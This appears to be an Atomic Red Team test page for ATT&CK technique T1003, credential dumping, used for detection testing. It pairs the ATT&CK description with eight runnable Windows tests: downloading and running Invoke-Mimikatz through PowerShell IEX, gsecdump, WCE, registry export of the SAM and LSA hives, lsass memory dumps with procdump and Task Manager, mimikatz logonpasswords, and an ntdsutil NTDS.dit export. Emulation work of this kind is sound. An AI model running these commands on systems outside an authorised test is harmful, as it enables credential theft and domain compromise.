# T1003 - Credential Dumping ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1003) <blockquote>Credential dumping is the process of obtaining account login and password information, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information. Several of the tools mentioned in this technique may be used by both adversaries and professional security testers. Additional custom tools likely exist as well. ### Windows #### SAM (Security Accounts Manager) The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required. A number of tools can be used to retrieve the SAM file through in-memory techniques: * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075): * <code>reg save HKLM\sam sam</code> * <code>reg save HKLM\system system</code> Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7) Notes: Rid 500 account is the local, in-built administrator. Rid 501 is the guest account. User accounts start with a RID of 1,000+. #### Cached Credentials The DCC2 (Domain Cached Credentials version 2) hash, used by Windows Vista and newer caches credentials when the domain controller is unavailable. The number of default cached credentials varies, and this number can be altered per system. This hash does not allow pass-the-hash style attacks. A number of tools can be used to retrieve the SAM file through in-memory techniques. * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: Cached credentials for Windows Vista are derived using PBKDF2. #### Local Security Authority (LSA) Secrets With SYSTEM access to a host, the LSA secrets often allows trivial access from a local account to domain-based account credentials. The Registry is used to store the LSA secrets. When services are run under the context of local or domain users, their passwords are stored in the Registry. If auto-logon is enabled, this information will be stored in the Registry as well. A number of tools can be used to retrieve the SAM file through in-memory techniques. * pwdumpx.exe * [gsecdump](https://attack.mitre.org/software/S0008) * [Mimikatz](https://attack.mitre.org/software/S0002) * secretsdump.py Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials. Notes: The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext. Windows 10 adds protections for LSA Secrets described in Mitigation. #### NTDS from Domain Controller Active Directory stores information about members of the domain including devices and users to verify credentials and define access rights. The Active Directory domain database is stored in the NTDS.dit file. By default the NTDS file will be located in %SystemRoot%\NTDS\Ntds.dit of a domain controller. (Citation: Wikipedia Active Directory) The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes. * Volume Shadow Copy * secretsdump.py * Using the in-built Windows tool, ntdsutil.exe * Invoke-NinjaCopy #### Group Policy Preference (GPP) Files Group Policy Preferences (GPP) are tools that allowed administrators to create domain policies with embedded credentials. These policies, amongst other things, allow administrators to set local accounts. These group policies are stored in SYSVOL on a domain controller, this means that any domain user can view the SYSVOL share and decrypt the password (the AES private key was leaked on-line. (Citation: Microsoft GPP Key) (Citation: SRD GPP) The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files: * Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp" * Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword) * gpprefdecrypt.py Notes: On the SYSVOL share, the following can be used to enumerate potential XML files. dir /s * .xml #### Service Principal Names (SPNs) See [Kerberoasting](https://attack.mitre.org/techniques/T1208). #### Plaintext Credentials After a user logs on to a system, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service (LSASS) process in memory. These credentials can be harvested by a administrative user or SYSTEM. SSPI (Security Support Provider Interface) functions as a common interface to several Security Support Providers (SSPs): A Security Support Provider is a dynamic-link library (DLL) that makes one or more security packages available to applications. The following SSPs can be used to access credentials: Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package. Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges. (Citation: TechNet Blogs Credential Protection) Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later. CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP) The following tools can be used to enumerate credentials: * [Windows Credential Editor](https://attack.mitre.org/software/S0005) * [Mimikatz](https://attack.mitre.org/software/S0002) As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system. For example, on the target host use procdump: * <code>procdump -ma lsass.exe lsass_dump</code> Locally, mimikatz can be run: * <code>sekurlsa::Minidump lsassdump.dmp</code> * <code>sekurlsa::logonPasswords</code> #### DCSync DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017) ### Linux #### Proc filesystem The /proc filesystem on Linux contains a great deal of information regarding the state of the running operating system. Processes running with root privileges can use this facility to scrape live memory of other running programs. If any of these programs store passwords in clear text or password hashes in memory, these values can then be harvested for either usage or brute force attacks, respectively. This functionality has been implemented in the [MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</blockquote> ## Atomic Tests - [Atomic Test #1 - Powershell Mimikatz](#atomic-test-1---powershell-mimikatz) - [Atomic Test #2 - Gsecdump](#atomic-test-2---gsecdump) - [Atomic Test #3 - Windows Credential Editor](#atomic-test-3---windows-credential-editor) - [Atomic Test #4 - Registry dump of SAM, creds, and secrets](#atomic-test-4---registry-dump-of-sam-creds-and-secrets) - [Atomic Test #5 - Dump LSASS.exe Memory using ProcDump](#atomic-test-5---dump-lsassexe-memory-using-procdump) - [Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager](#atomic-test-6---dump-lsassexe-memory-using-windows-task-manager) - [Atomic Test #7 - Offline Credential Theft With Mimikatz](#atomic-test-7---offline-credential-theft-with-mimikatz) - [Atomic Test #8 - Dump Active Directory Database with NTDSUtil](#atomic-test-8---dump-active-directory-database-with-ntdsutil) <br/> ## Atomic Test #1 - Powershell Mimikatz Dumps Credentials via Powershell by invoking a remote mimikatz script **Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1| #### Run it with `powershell`! ``` IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds ``` <br/> <br/> ## Atomic Test #2 - Gsecdump https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 **Supported Platforms:** Windows #### Run it with `command_prompt`! ``` gsecdump -a ``` <br/> <br/> ## Atomic Test #3 - Windows Credential Editor http://www.ampliasecurity.com/research/windows-credentials-editor/ **Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting data should be placed | Path | output.txt| #### Run it with `command_prompt`! ``` wce -o #{output_file} ``` <br/> <br/> ## Atomic Test #4 - Registry dump of SAM, creds, and secrets Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 **Supported Platforms:** Windows #### Run it with `command_prompt`! ``` reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security ``` <br/> <br/> ## Atomic Test #5 - Dump LSASS.exe Memory using ProcDump The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump. **Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| #### Run it with `command_prompt`! ``` procdump.exe -accepteula -ma lsass.exe #{output_file} ``` <br/> <br/> ## Atomic Test #6 - Dump LSASS.exe Memory using Windows Task Manager The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task Manager and administrative permissions. **Supported Platforms:** Windows #### Run it with these steps! 1. Open Task Manager: On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking on the task bar and selecting "Task Manager". 2. Select lsass.exe: If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe and select it for manipulation. 3. Dump lsass.exe memory: Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file. <br/> <br/> ## Atomic Test #7 - Offline Credential Theft With Mimikatz The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz. **Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | input_file | Path where resulting dump should be placed | Path | lsass_dump.dmp| #### Run it with these steps! 1. Open Mimikatz: Execute `mimikatz` at a command prompt. 2. Select a Memory Dump: Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}` 3. Obtain Credentials: Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full` <br/> <br/> ## Atomic Test #8 - Dump Active Directory Database with NTDSUtil The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of subsequent domain controllers without the need of network-based replication. **Supported Platforms:** Windows #### Inputs | Name | Description | Type | Default Value | |------|-------------|------|---------------| | output_folder | Path where resulting dump should be placed | Path | C:\Atomic_Red_Team| #### Run it with `command_prompt`! ``` ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q ``` <br/>